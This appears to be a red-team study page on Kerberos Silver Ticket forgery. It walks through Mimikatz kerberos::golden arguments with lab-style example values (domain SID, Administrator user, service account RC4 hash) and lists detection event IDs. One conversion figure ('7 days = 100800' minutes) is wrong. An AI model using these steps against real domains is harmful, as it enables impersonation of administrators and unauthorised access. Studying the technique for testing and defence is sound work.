Silver Tickets
General
A valid TGS
Encrypted and signed by NTLM hash of the target service account
Services rarely check PAC (Privileged Attribute Certificate)
Services will allow access only to the services themselves
Reasonable persistence period (detauled 30 days for computer accounts)
Exploitation
Arguments
kerberos::golden
Name of the module (there is no Silver module!)
/domain:domain:dollarcorp.moneycorp.local
Domain FQDN
/sid:S-1-5-21-1874506631-3219952063-538504511
SID of the domain
/target:dcorp dc.dollarcorp.moneycorp.local
Target server FQDN
/User:Administrator
Username for which the TGT is generated
/id:500 /groups:512
Optional User RID (default 500) and Group (default 513 512 520 518 519)
/service:cifs
The SPN name of the target service for the TGS
/rc4:6f5b5acaf7433b3282ac22e21e62ff22
NTLM (RC4) hash of the service/machine account (<MACHINE-NAME$>). Use /aes128 and /aes256 for using AES keys.
/startoffset:0
Optional when the ticket is available (default 0 right now) in minutes. Use negative for a ticket available from past and a larger number for future.
/endin:600
Optional ticket lifetime (default is 10 years) in minutes. The default AD setting is 10 hours = 600 minutes
/renewmax:10080
Optional ticket lifetime with renewal (default is 10 years) in minutes. The default AD setting is 7 days = 100800
/ptt
Injects the ticket in current PowerShell process no need to save the ticket on disk
Commands
Getting Command Execution
Scheduled Tasks through HOST Service
WMI
Detection
Event IDs:
4624: Account Logon
4634: Account Logoff
4672: Admin Logon
Last updated